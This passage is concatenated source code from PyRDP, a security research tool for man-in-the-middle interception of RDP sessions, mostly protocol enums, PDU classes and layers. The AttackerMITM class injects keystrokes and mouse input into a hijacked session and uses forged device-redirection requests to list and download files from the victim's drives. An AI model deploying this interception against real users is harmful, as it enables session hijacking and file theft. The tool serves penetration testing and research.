            ErrorInfo.ERRINFO_VIRTUALCHANNELDECOMPRESSIONERR: "An error occurred while using the bulk compressor (section 3.1.8 and [MS-RDPEGDI] section 3.1.8) to decompress a Virtual Channel PDU (section 2.2.6.1).",
            ErrorInfo.ERRINFO_INVALIDVCCOMPRESSIONTYPE: "An invalid bulk compression package was specified in the flags field of the Channel PDU Header (section 2.2.6.1.1).",
            ErrorInfo.ERRINFO_INVALIDCHANNELID: "An invalid MCS channel ID was specified in the mcsPdu field of the Virtual Channel PDU (section 2.2.6.1).",
            ErrorInfo.ERRINFO_VCHANNELSTOOMANY: "The client requested more than the maximum allowed 31 static virtual channels in the Client Network Data (section 2.2.1.3.4).",
            ErrorInfo.ERRINFO_REMOTEAPPSNOTENABLED: "The INFO_RAIL flag (0x00008000) MUST be set in the flags field of the Info Packet (section 2.2.1.11.1.1) as the session on the remote server can only host remote applications.",
            ErrorInfo.ERRINFO_CACHECAPNOTSET: "The client sent a Persistent Key List PDU (section 2.2.1.17) without including the prerequisite Revision 2 Bitmap Cache Capability Set (section 2.2.7.1.4.2) in the Confirm Active PDU (section 2.2.1.13.2).",
            ErrorInfo.ERRINFO_BITMAPCACHEERRORPDUBADLENGTH2: "The NumInfoBlocks field in the Bitmap Cache Error PDU Data is inconsistent with the amount of data in the Info field ([MS-RDPEGDI] section 2.2.2.3.1.1).",
            ErrorInfo.ERRINFO_OFFSCRCACHEERRORPDUBADLENGTH: "There is not enough data to process an Offscreen Bitmap Cache Error PDU ([MS-RDPEGDI] section 2.2.2.3.2).",
            ErrorInfo.ERRINFO_GDIPLUSPDUBADLENGTH: "There is not enough data to process a GDI+ Error PDU ([MS-RDPEGDI] section 2.2.2.3.4).",
            ErrorInfo.ERRINFO_SECURITYDATATOOSHORT2: "There is not enough data to read a Basic Security Header (section 2.2.8.1.1.2.1).",
            ErrorInfo.ERRINFO_SECURITYDATATOOSHORT3: "There is not enough data to read a Non-FIPS Security Header (section 2.2.8.1.1.2.2) or FIPS Security Header (section 2.2.8.1.1.2.3).",
            ErrorInfo.ERRINFO_SECURITYDATATOOSHORT4: "There is not enough data to read the basicSecurityHeader and length fields of the Security Exchange PDU Data (section 2.2.1.10.1).",
            ErrorInfo.ERRINFO_SECURITYDATATOOSHORT5: "There is not enough data to read the CodePage, flags, cbDomain, cbUserName, cbPassword, cbAlternateShell, cbWorkingDir, Domain, UserName, Password, AlternateShell, and WorkingDir fields in the Info Packet (section 2.2.1.11.1.1).",
            ErrorInfo.ERRINFO_SECURITYDATATOOSHORT6: "There is not enough data to read the CodePage, flags, cbDomain, cbUserName, cbPassword, cbAlternateShell, and cbWorkingDir fields in the Info Packet (section 2.2.1.11.1.1).",
            ErrorInfo.ERRINFO_SECURITYDATATOOSHORT7: "There is not enough data to read the clientAddressFamily and cbClientAddress fields in the Extended Info Packet (section 2.2.1.11.1.1.1).",
            ErrorInfo.ERRINFO_SECURITYDATATOOSHORT8: "There is not enough data to read the clientAddress field in the Extended Info Packet (section 2.2.1.11.1.1.1).",
            ErrorInfo.ERRINFO_SECURITYDATATOOSHORT9: "There is not enough data to read the cbClientDir field in the Extended Info Packet (section 2.2.1.11.1.1.1).",
            ErrorInfo.ERRINFO_SECURITYDATATOOSHORT10: "There is not enough data to read the clientDir field in the Extended Info Packet (section 2.2.1.11.1.1.1).",
            ErrorInfo.ERRINFO_SECURITYDATATOOSHORT11: "There is not enough data to read the clientTimeZone field in the Extended Info Packet (section 2.2.1.11.1.1.1).",
            ErrorInfo.ERRINFO_SECURITYDATATOOSHORT12: "There is not enough data to read the clientSessionId field in the Extended Info Packet (section 2.2.1.11.1.1.1).",
            ErrorInfo.ERRINFO_SECURITYDATATOOSHORT13: "There is not enough data to read the performanceFlags field in the Extended Info Packet (section 2.2.1.11.1.1.1).",
            ErrorInfo.ERRINFO_SECURITYDATATOOSHORT14: "There is not enough data to read the cbAutoReconnectCookie field in the Extended Info Packet (section 2.2.1.11.1.1.1).",
            ErrorInfo.ERRINFO_SECURITYDATATOOSHORT15: "There is not enough data to read the autoReconnectCookie field in the Extended Info Packet (section 2.2.1.11.1.1.1).",
            ErrorInfo.ERRINFO_SECURITYDATATOOSHORT16: "The cbAutoReconnectCookie field in the Extended Info Packet (section 2.2.1.11.1.1.1) contains a value which is larger than the maximum allowed length of 128 bytes.",
            ErrorInfo.ERRINFO_SECURITYDATATOOSHORT17: "There is not enough data to read the clientAddressFamily and cbClientAddress fields in the Extended Info Packet (section 2.2.1.11.1.1.1).",
            ErrorInfo.ERRINFO_SECURITYDATATOOSHORT18: "There is not enough data to read the clientAddress field in the Extended Info Packet (section 2.2.1.11.1.1.1).",
            ErrorInfo.ERRINFO_SECURITYDATATOOSHORT19: "There is not enough data to read the cbClientDir field in the Extended Info Packet (section 2.2.1.11.1.1.1).",
            ErrorInfo.ERRINFO_SECURITYDATATOOSHORT20: "There is not enough data to read the clientDir field in the Extended Info Packet (section 2.2.1.11.1.1.1).",
            ErrorInfo.ERRINFO_SECURITYDATATOOSHORT21: "There is not enough data to read the clientTimeZone field in the Extended Info Packet (section 2.2.1.11.1.1.1).",
            ErrorInfo.ERRINFO_SECURITYDATATOOSHORT22: "There is not enough data to read the clientSessionId field in the Extended Info Packet (section 2.2.1.11.1.1.1).",
            ErrorInfo.ERRINFO_SECURITYDATATOOSHORT23: "There is not enough data to read the Client Info PDU Data (section 2.2.1.11.1).",
            ErrorInfo.ERRINFO_BADMONITORDATA: "The monitorCount field in the Client Monitor Data (section 2.2.1.3.6) is invalid.",
            ErrorInfo.ERRINFO_VCDECOMPRESSEDREASSEMBLEFAILED: "The server-side decompression buffer is invalid, or the size of the decompressed VC data exceeds the chunking size specified in the Virtual Channel Capability Set (section 2.2.7.1.10).",
            ErrorInfo.ERRINFO_VCDATATOOLONG: "The size of a received Virtual Channel PDU (section 2.2.6.1) exceeds the chunking size specified in the Virtual Channel Capability Set (section 2.2.7.1.10).",
        }

        return MESSAGES.get(errorInfo, str(errorInfo))


class InputEventType(IntEnum):
    """
    Slow-path input message type
    See: http://msdn.microsoft.com/en-us/library/cc240583.aspx
    """
    INPUT_EVENT_SYNC = 0x0000
    INPUT_EVENT_UNUSED = 0x0002
    INPUT_EVENT_SCANCODE = 0x0004
    INPUT_EVENT_UNICODE = 0x0005
    INPUT_EVENT_MOUSE = 0x8001
    INPUT_EVENT_MOUSEX = 0x8002


class SynchronizeFlag(IntEnum):
    TS_SYNC_SCROLL_LOCK = 0x00000001
    TS_SYNC_NUM_LOCK = 0x00000002
    TS_SYNC_CAPS_LOCK = 0x00000004
    TS_SYNC_KANA_LOCK = 0x00000008


class KeyboardFlag(IntEnum):
    KBDFLAGS_EXTENDED = 0x0100
    KBDFLAGS_DOWN = 0x4000
    KBDFLAGS_RELEASE = 0x8000


class PointerFlag(IntEnum):
    PTRFLAGS_WHEEL_NEGATIVE = 0x0100
    PTRFLAGS_WHEEL = 0x0200
    PTRFLAGS_HWHEEL = 0x0400
    WheelRotationMask = 0x01FF

    PTRFLAGS_MOVE = 0x0800

    PTRFLAGS_BUTTON1 = 0x1000
    PTRFLAGS_BUTTON2 = 0x2000
    PTRFLAGS_BUTTON3 = 0x4000
    PTRFLAGS_DOWN = 0x8000

    PTRXFLAGS_BUTTON1 = 0x0001
    PTRXFLAGS_BUTTON2 = 0x0002


class PointerEventType(IntEnum):
    TS_PTRMSGTYPE_SYSTEM = 0x0001
    TS_PTRMSGTYPE_POSITION = 0x0003
    TS_PTRMSGTYPE_COLOR = 0x0006
    TS_PTRMSGTYPE_CACHED = 0x0007
    TS_PTRMSGTYPE_POINTER = 0x0008


class ChannelOption(IntFlag):
    """
    https://msdn.microsoft.com/en-us/library/cc240513.aspx
    """

    CHANNEL_OPTION_INITIALIZED = 0x80000000
    CHANNEL_OPTION_ENCRYPT_RDP = 0x40000000
    CHANNEL_OPTION_ENCRYPT_SC = 0x20000000
    CHANNEL_OPTION_ENCRYPT_CS = 0x10000000
    CHANNEL_OPTION_PRI_HIGH = 0x08000000
    CHANNEL_OPTION_PRI_MED = 0x04000000
    CHANNEL_OPTION_PRI_LOW = 0x02000000
    CHANNEL_OPTION_COMPRESS_RDP = 0x00800000
    CHANNEL_OPTION_COMPRESS = 0x00400000
    CHANNEL_OPTION_SHOW_PROTOCOL = 0x00200000
    REMOTE_CONTROL_PERSISTENT = 0x00100000


class BitmapFlags(IntEnum):
    """
    https://msdn.microsoft.com/en-us/library/cc240612.aspx
    """
    BITMAP_COMPRESSION = 0x0001
    NO_BITMAP_COMPRESSION_HDR = 0x0400


class FastPathFragmentation(IntEnum):
    """
    https://msdn.microsoft.com/en-us/library/cc240622.aspx
    """
    FASTPATH_FRAGMENT_SINGLE = 0x0
    FASTPATH_FRAGMENT_LAST = 0x1
    FASTPATH_FRAGMENT_FIRST = 0x2
    FASTPATH_FRAGMENT_NEXT = 0x3


class SurfaceCommand(IntEnum):
    """
    https://msdn.microsoft.com/en-us/library/dd871563.aspx
    """
    SURFCMDS_SETSURFACEBITS = 0x00000002
    SURFCMDS_FRAMEMARKER = 0x00000010
    SURFCMDS_STREAMSURFACEBITS = 0x00000040



#
# This file is part of the PyRDP project.
# Copyright (C) 2018-2020 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from typing import Dict, Optional

from pyrdp.enum import CapabilityType, SlowPathUpdateType
from pyrdp.pdu.pdu import PDU
from pyrdp.pdu.rdp.capability import Capability


class ShareControlHeader(PDU):
    def __init__(self, pduType, version, source):
        super().__init__()
        self.pduType = pduType
        self.version = version
        self.source = source


class ShareDataHeader(ShareControlHeader):
    def __init__(self, pduType, version, source, shareID, streamID,
                 uncompressedLength, subtype, compressedType, compressedLength):
        ShareControlHeader.__init__(self, pduType, version, source)
        self.shareID = shareID
        self.streamID = streamID
        self.uncompressedLength = uncompressedLength
        self.subtype = subtype
        self.compressedType = compressedType
        self.compressedLength = compressedLength


class SlowPathPDU(PDU):
    """
    Base class for slow-path PDUs
    """

    def __init__(self, header: ShareControlHeader, payload: bytes = b""):
        super().__init__(payload)
        self.header = header


class SlowPathUnparsedPDU(SlowPathPDU):
    """
    Class for slow-path PDUs with unimplemented parsing
    """

    def __init__(self, header: ShareControlHeader, payload: bytes):
        super().__init__(header, payload)


class DemandActivePDU(SlowPathPDU):
    """
    https://msdn.microsoft.com/en-us/library/cc240484.aspx
    """

    def __init__(self, header: ShareControlHeader, shareID: int, sourceDescriptor: bytes, numberCapabilities: int,
                 capabilitySets: bytes, sessionID: int, parsedCapabilitySets: Dict[CapabilityType, Capability] = None):

        super().__init__(header)
        self.shareID = shareID
        self.sourceDescriptor = sourceDescriptor
        self.numberCapabilities = numberCapabilities
        self.capabilitySets = capabilitySets
        self.sessionID = sessionID
        self.parsedCapabilitySets = parsedCapabilitySets


class ConfirmActivePDU(SlowPathPDU):
    def __init__(self, header, shareID, originatorID, sourceDescriptor, numberCapabilities, parsedCapabilitySets,
                 capabilitySetsRaw):

        super().__init__(header)
        self.shareID = shareID
        self.originatorID = originatorID
        self.sourceDescriptor = sourceDescriptor
        self.numberCapabilities = numberCapabilities
        self.parsedCapabilitySets = parsedCapabilitySets
        self.capabilitySets = capabilitySetsRaw


class SetErrorInfoPDU(SlowPathPDU):
    def __init__(self, header, errorInfo):
        super().__init__(header)
        self.errorInfo = errorInfo


class SynchronizePDU(SlowPathPDU):
    def __init__(self, header, messageType, targetUser):

        super().__init__(header)
        self.messageType = messageType
        self.targetUser = targetUser


class ControlPDU(SlowPathPDU):
    def __init__(self, header, action, grantID, controlID):
        super().__init__(header)
        self.action = action
        self.grantID = grantID
        self.controlID = controlID


class InputPDU(SlowPathPDU):
    def __init__(self, header, events):
        super().__init__(header)
        self.header = header
        self.events = events


class PlaySoundPDU(SlowPathPDU):
    def __init__(self, header, duration, frequency):
        super().__init__(header)
        self.duration = duration
        self.frequency = frequency


class PointerPDU(SlowPathPDU):
    def __init__(self, header, event):

        super().__init__(header)
        self.event = event


class SuppressOutputPDU(SlowPathPDU):
    def __init__(self, header, allowDisplayUpdates,
                 left: Optional[int], top: Optional[int], right: Optional[int], bottom: Optional[int]):

        super().__init__(header)
        self.allowDisplayUpdates = bool(allowDisplayUpdates)
        self.left = left
        self.top = top
        self.right = right
        self.bottom = bottom


class UpdatePDU(SlowPathPDU):
    def __init__(self, header: ShareDataHeader, updateType: SlowPathUpdateType, updateData: bytes):
        super().__init__(header)
        self.updateType = updateType
        self.updateData = updateData


class PersistentCacheKeysPDU(SlowPathPDU):
    def __init__(self, header, num0, num1, num2, num3, num4, total0, total1, total2, total3, total4, keys, mask):
        super().__init__(header)
        self.num0 = num0
        self.num1 = num1
        self.num2 = num2
        self.num3 = num3
        self.num4 = num4

        self.total0 = total0
        self.total1 = total1
        self.total2 = total2
        self.total3 = total3
        self.total4 = total4

        self.keys = keys
        self.mask = mask



#
# This file is part of the PyRDP project.
# Copyright (C) 2018 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from abc import ABCMeta, abstractmethod

from pyrdp.parser.parser import Parser


class SegmentationParser(Parser, metaclass=ABCMeta):
    @abstractmethod
    def isCompletePDU(self, data: bytes) -> bool:
        """
        Check if a stream of data contains a complete PDU.
        :param data: the data.
        :return: True if the data contains a complete PDU.
        """
        raise NotImplementedError("isCompletePDU must be overridden")

    @abstractmethod
    def getPDULength(self, data: bytes) -> int:
        """
        Get the length of data required for the PDU contained in a stream of data.
        :param data: the data.
        :return: length required.
        """
        raise NotImplementedError("getPDULength must be overridden")


#
# This file is part of the PyRDP project.
# Copyright (C) 2018 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from pyrdp.core import ObservedBy
from pyrdp.layer.buffered import BufferedLayer
from pyrdp.layer.layer import LayerObserver
from pyrdp.parser import SegmentationParser
from pyrdp.pdu import FastPathPDU


class FastPathObserver(LayerObserver):
    """
    Observer for fast-path PDUs.
    """

    def onPDUReceived(self, pdu: FastPathPDU):
        pass


@ObservedBy(FastPathObserver)
class FastPathLayer(BufferedLayer):
    """
    Layer for fast-path PDUs.
    """

    def __init__(self, parser: SegmentationParser):
        super().__init__(parser)

    def shouldForward(self, pdu: FastPathPDU) -> bool:
        return False


#
# This file is part of the PyRDP project.
# Copyright (C) 2020-2023 GoSecure Inc.
# Licensed under the GPLv3 or later.
#
import logging
import random

from twisted.internet.protocol import ServerFactory
import namesgenerator

from pyrdp.mitm import MITMConfig, RDPMITM
from pyrdp.logging import LOGGER_NAMES, SessionLogger


class MITMServerFactory(ServerFactory):
    """
    Server factory for the RDP man-in-the-middle that generates a unique session ID for every connection.
    """

    def __init__(self, config: MITMConfig):
        """
        :param config: the MITM configuration
        """
        self.config = config

    def buildProtocol(self, addr):
        sessionID = f"{namesgenerator.get_random_name()}_{random.randrange(1000000,9999999)}"

        # mainLogger logs in a file and stdout
        mainlogger = logging.getLogger(LOGGER_NAMES.MITM_CONNECTIONS)
        mainlogger = SessionLogger(mainlogger, sessionID)

        # crawler logger only logs to a file for analysis purposes
        crawlerLogger = logging.getLogger(LOGGER_NAMES.CRAWLER)
        crawlerLogger = SessionLogger(crawlerLogger, sessionID)

        mitm = RDPMITM(mainlogger, crawlerLogger, self.config)

        return mitm.getProtocol()



#
# This file is part of the PyRDP project.
# Copyright (C) 2018-2021 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from pyrdp.player.Replay import Replay, ReplayReader
from .BaseEventHandler import BaseEventHandler
from .HeadlessEventHandler import HeadlessEventHandler

# UI-Specific imports. These might fail when UI dependencies are not
# present.
try:
    from pyrdp.player.BaseTab import BaseTab
    from pyrdp.player.BaseWindow import BaseWindow
    from pyrdp.player.LiveTab import LiveTab
    from pyrdp.player.LiveThread import LiveThread
    from pyrdp.player.LiveWindow import LiveWindow
    from pyrdp.player.MainWindow import MainWindow
    from pyrdp.player.QTimerSequencer import QTimerSequencer
    from pyrdp.player.ReplayBar import ReplayBar
    from pyrdp.player.ReplayTab import ReplayTab
    from pyrdp.player.ReplayThread import ReplayThread, ReplayThreadEvent
    from pyrdp.player.ReplayWindow import ReplayWindow
    from pyrdp.player.SeekBar import SeekBar
    HAS_GUI = True
except ModuleNotFoundError:
    HAS_GUI = False



#
# This file is part of the PyRDP project.
# Copyright (C) 2018 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from pyrdp.layer.layer import IntermediateLayer
from pyrdp.parser.RawParser import RawParser
from pyrdp.pdu import PDU


class RawLayer(IntermediateLayer):
    """
    Simple layer that uses raw PDUs and always forwards data.
    """

    def __init__(self):
        super().__init__(RawParser())

    def shouldForward(self, pdu: PDU) -> bool:
        return True


#
# This file is part of the PyRDP project.
# Copyright (C) 2021 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from enum import IntEnum

class NTLMSSPMessageType(IntEnum):
    NEGOTIATE_MESSAGE = 1
    CHALLENGE_MESSAGE = 2
    AUTHENTICATE_MESSAGE = 3

class NTLMSSPChallengeType(IntEnum):
    WORKSTATION_BUFFER_OFFSET = 0x38
    
    # http://davenport.sourceforge.net/ntlm.html#theNtlmFlags
    # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/99d90ff4-957f-4c8a-80e4-5bfe5a9a9832
    # Flags: (
    # NTLMSSP_NEGOTIATE_UNICODE | NTLMSSP_NEGOTIATE_SIGN | NTLMSSP_NEGOTIATE_NTLM |
    # NTLMSSP_NEGOTIATE_ALWAYS_SIGN | NTLMSSP_TARGET_TYPE_SERVER | NTLMSSP_NEGOTIATE_LM_KEY |
    # NTLMSSP_NEGOTIATE_TARGET_INFO | r | NTLMSSP_NEGOTIATE_128 |
    # NTLMSSP_NEGOTIATE_KEY_EXCH | NTLMSSP_NEGOTIATE_56
    # )
    NEGOTIATE_FLAGS = 0xE28A8215

    # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/83f5e789-660d-4781-8491-5f8c6641f75e
    NTLMSSP_NTLM_CHALLENGE_AV_PAIRS_ID  = 0x0002 # MsvAvNbDomainName
    NTLMSSP_NTLM_CHALLENGE_AV_PAIRS1_ID = 0x0001 # MsvAvNbComputerName
    NTLMSSP_NTLM_CHALLENGE_AV_PAIRS2_ID = 0x0004 # MsvAvDnsDomainName
    NTLMSSP_NTLM_CHALLENGE_AV_PAIRS3_ID = 0x0003 # MsvAvDnsComputerName
    NTLMSSP_NTLM_CHALLENGE_AV_PAIRS5_ID = 0x0005 # MsvAvDnsTreeName
    NTLMSSP_NTLM_CHALLENGE_AV_PAIRS6_ID = 0x0000 # MsvAvEOL


class NTLMSSPChallengeVersion(IntEnum):
    CREDSSP_VERSION = 0x05

    # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/b1a6ceb2-f8ad-462b-b5af-f18527c48175
    NEG_PROD_MAJOR_VERSION_HIGH = 0x06
    NEG_PROD_MINOR_VERSION_LOW  = 0x02
    NEG_PROD_VERSION_BUILT      = 0x0ECE
    NEG_NTLM_REVISION_CURRENT   = 0x0F      # NTLMSSP_REVISION_W2K3



#
# This file is part of the PyRDP project.
# Copyright (C) 2019 GoSecure Inc.
# Licensed under the GPLv3 or later.
#
from collections import defaultdict
from logging import LoggerAdapter
from pathlib import Path
from typing import Dict, List, Optional
from functools import partial

from pyrdp.enum import FastPathInputType, FastPathOutputType, MouseButton, PlayerPDUType, PointerFlag, ScanCodeTuple
from pyrdp.layer import FastPathLayer, PlayerLayer
from pyrdp.mitm.DeviceRedirectionMITM import DeviceRedirectionMITM, DeviceRedirectionMITMObserver
from pyrdp.mitm.MITMRecorder import MITMRecorder
from pyrdp.mitm.state import RDPMITMState
from pyrdp.parser import BitmapParser
from pyrdp.pdu import BitmapUpdateData, DeviceAnnounce, FastPathBitmapEvent, FastPathInputEvent, FastPathMouseEvent, \
    FastPathOutputEvent, FastPathPDU, FastPathScanCodeEvent, FastPathUnicodeEvent, PlayerBitmapPDU, \
    PlayerDeviceMappingPDU, PlayerDirectoryListingRequestPDU, PlayerDirectoryListingResponsePDU, PlayerFileDescription, \
    PlayerFileDownloadCompletePDU, PlayerFileDownloadRequestPDU, PlayerFileDownloadResponsePDU, \
    PlayerForwardingStatePDU, PlayerKeyboardPDU, PlayerMouseButtonPDU, PlayerMouseMovePDU, PlayerMouseWheelPDU, \
    PlayerPDU, PlayerTextPDU


class AttackerMITM(DeviceRedirectionMITMObserver):
    """
    MITM component for commands coming from the player. The job of this component is just to adapt the format of events
    received to the format expected by RDP.
    """

    def __init__(self, client: FastPathLayer, server: FastPathLayer, attacker: PlayerLayer, log: LoggerAdapter, state: RDPMITMState, recorder: MITMRecorder):
        """
        :param client: fast-path layer for the client side
        :param server: fast-path layer for the server side
        :param attacker: player layer for the attacker side
        :param log: logger for this component
        :param log: state of the MITM
        :param recorder: recorder for this connection
        """
        super().__init__()

        self.client = client
        self.server = server
        self.attacker = attacker
        self.log = log
        self.state = state
        self.recorder = recorder
        self.devices: Dict[int, DeviceAnnounce] = {}
        self.deviceRedirection: Optional[DeviceRedirectionMITM] = None
        self.fileDownloadRequests: Dict[int, Path] = {}
        self.directoryListingRequests: Dict[int, Path] = {}
        self.directoryListingLists = defaultdict(list)

        self.attacker.createObserver(
            onPDUReceived = self.onPDUReceived,
        )

        self.handlers = {
            PlayerPDUType.MOUSE_MOVE: self.handleMouseMove,
            PlayerPDUType.MOUSE_BUTTON: self.handleMouseButton,
            PlayerPDUType.MOUSE_WHEEL: self.handleMouseWheel,
            PlayerPDUType.KEYBOARD: self.handleKeyboard,
            PlayerPDUType.TEXT: self.handleText,
            PlayerPDUType.FORWARDING_STATE: self.handleForwardingState,
            PlayerPDUType.BITMAP: self.handleBitmap,
            PlayerPDUType.FILE_DOWNLOAD_REQUEST: self.handleFileDownloadRequest,
            PlayerPDUType.DIRECTORY_LISTING_REQUEST: self.handleDirectoryListingRequest,
        }

    def setDeviceRedirectionComponent(self, deviceRedirection: DeviceRedirectionMITM):
        if self.deviceRedirection:
            self.deviceRedirection.removeObserver(self)

        if deviceRedirection:
            deviceRedirection.addObserver(self)

        self.deviceRedirection = deviceRedirection


    def onPDUReceived(self, pdu: PlayerPDU):
        if pdu.header in self.handlers:
            self.handlers[pdu.header](pdu)


    def sendInputEvents(self, events: List[FastPathInputEvent]):
        pdu = FastPathPDU(0, events)
        self.recorder.record(pdu, PlayerPDUType.FAST_PATH_INPUT, True)
        self.server.sendPDU(pdu)

    def sendOutputEvents(self, events: List[FastPathOutputEvent]):
        pdu = FastPathPDU(0, events)
        self.client.sendPDU(pdu)

    def sendKeys(self, keys: List[ScanCodeTuple]):
        for released in [False, True]:
            for key in keys:
                self.handleKeyboard(PlayerKeyboardPDU(0, key.code, released, key.extended))


    def sendOne(self, x, y):
        self.handleText(PlayerTextPDU(0, x, y))
        return 25

    def sendText(self, text: str):
        seq = []

        for c in text:
            for released in [False, True]:
                seq.append(partial(self.sendOne, c, released))

        return seq


    def handleMouseMove(self, pdu: PlayerMouseMovePDU):
        eventHeader = FastPathInputType.FASTPATH_INPUT_EVENT_MOUSE << 5
        flags = PointerFlag.PTRFLAGS_MOVE
        x = pdu.x
        y = pdu.y

        event = FastPathMouseEvent(eventHeader, flags, x, y)
        self.sendInputEvents([event])


    def handleMouseButton(self, pdu: PlayerMouseButtonPDU):
        mapping = {
            MouseButton.LEFT_BUTTON: PointerFlag.PTRFLAGS_BUTTON1,
            MouseButton.RIGHT_BUTTON: PointerFlag.PTRFLAGS_BUTTON2,
            MouseButton.MIDDLE_BUTTON: PointerFlag.PTRFLAGS_BUTTON3,
        }

        if pdu.button not in mapping:
            return

        eventHeader = FastPathInputType.FASTPATH_INPUT_EVENT_MOUSE << 5
        flags = mapping[pdu.button] | (PointerFlag.PTRFLAGS_DOWN if pdu.pressed else 0)
        x = pdu.x
        y = pdu.y

        event = FastPathMouseEvent(eventHeader, flags, x, y)
        self.sendInputEvents([event])


    def handleMouseWheel(self, pdu: PlayerMouseWheelPDU):
        eventHeader = FastPathInputType.FASTPATH_INPUT_EVENT_MOUSE << 5
        flags = PointerFlag.PTRFLAGS_WHEEL
        x = pdu.x
        y = pdu.y

        if pdu.delta < 0:
            flags |= PointerFlag.PTRFLAGS_WHEEL_NEGATIVE

        if pdu.horizontal:
            flags |= PointerFlag.PTRFLAGS_HWHEEL

        flags |= abs(pdu.delta) & PointerFlag.WheelRotationMask

        event = FastPathMouseEvent(eventHeader, flags, x, y)
        self.sendInputEvents([event])


    def handleKeyboard(self, pdu: PlayerKeyboardPDU):
        event = FastPathScanCodeEvent(2 if pdu.extended else 0, pdu.code, pdu.released)
        self.sendInputEvents([event])

    def handleText(self, pdu: PlayerTextPDU):
        event = FastPathUnicodeEvent(pdu.character, pdu.released)
        self.sendInputEvents([event])


    def handleForwardingState(self, pdu: PlayerForwardingStatePDU):
        self.state.forwardInput = pdu.forwardInput
        self.state.forwardOutput = pdu.forwardOutput


    def handleBitmap(self, pdu: PlayerBitmapPDU):
        bpp = 32
        flags = 0

        # RDP expects bitmap data in bottom-up, left-to-right
        # See: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/84a3d4d2-5523-4e49-9a48-33952c559485
        for y in range(pdu.height):
            pixels = pdu.pixels[y * pdu.width * 4 : (y + 1) * pdu.width * 4]
            bitmap = BitmapUpdateData(0, y, pdu.width, y + 1, pdu.width, 1, bpp, flags, pixels)
            bitmapData = BitmapParser().writeBitmapUpdateData([bitmap])
            event = FastPathBitmapEvent(FastPathOutputType.FASTPATH_UPDATETYPE_BITMAP, None, [], bitmapData)
            self.sendOutputEvents([event])


    def onDeviceAnnounce(self, device: DeviceAnnounce):
        self.devices[device.deviceID] = device

        pdu = PlayerDeviceMappingPDU(self.attacker.getCurrentTimeStamp(), device.deviceID, device.deviceType, device.preferredDOSName)
        self.recorder.record(pdu, pdu.header)


    def handleFileDownloadRequest(self, pdu: PlayerFileDownloadRequestPDU):
        path = pdu.path.replace("/", "\\")

        requestID = self.deviceRedirection.sendForgedFileRead(pdu.deviceID, path)
        self.fileDownloadRequests[requestID] = path

    def onFileDownloadResult(self, deviceID: int, requestID: int, path: str, offset: int, data: bytes):
        if requestID not in self.fileDownloadRequests:
            return

        pdu = PlayerFileDownloadResponsePDU(
            self.attacker.getCurrentTimeStamp(),
            deviceID,
            path.replace("\\", "/"),
            offset,
            data
        )

        self.attacker.sendPDU(pdu)

    def onFileDownloadComplete(self, deviceID: int, requestID: int, path: str, error: int):
        pdu = PlayerFileDownloadCompletePDU(
            self.attacker.getCurrentTimeStamp(),
            deviceID,
            path.replace("\\", "/"),
            error
        )

        self.attacker.sendPDU(pdu)
        self.fileDownloadRequests.pop(requestID, None)


    def handleDirectoryListingRequest(self, pdu: PlayerDirectoryListingRequestPDU):
        if self.deviceRedirection is None:
            self.log.error("A directory listing request was received from the player, but the channel was not initialized.")
            return

        listingPath = str(Path(pdu.path).absolute()).replace("/", "\\")

        if not listingPath.endswith("*"):
            if not listingPath.endswith("\\"):
                listingPath += "\\"

            listingPath += "*"

        requestID = self.deviceRedirection.sendForgedDirectoryListing(pdu.deviceID, listingPath)
        self.directoryListingRequests[requestID] = Path(pdu.path).absolute()

    def onDirectoryListingResult(self, deviceID: int, requestID: int, fileName: str, isDirectory: bool):
        if requestID not in self.directoryListingRequests:
            return

        path = self.directoryListingRequests[requestID]
        filePath = path / fileName

        description = PlayerFileDescription(str(filePath), isDirectory)
        directoryList = self.directoryListingLists[requestID]
        directoryList.append(description)

        if len(directoryList) == 10:
            self.sendDirectoryList(requestID, deviceID)
            directoryList.clear()

    def onDirectoryListingComplete(self, deviceID: int, requestID: int):
        self.sendDirectoryList(requestID, deviceID)
        self.directoryListingRequests.pop(requestID, None)
        self.directoryListingLists.pop(requestID, None)

    def sendDirectoryList(self, requestID: int, deviceID: int):
        directoryList = self.directoryListingLists[requestID]
        pdu = PlayerDirectoryListingResponsePDU(self.attacker.getCurrentTimeStamp(), deviceID, directoryList)
        self.attacker.sendPDU(pdu)
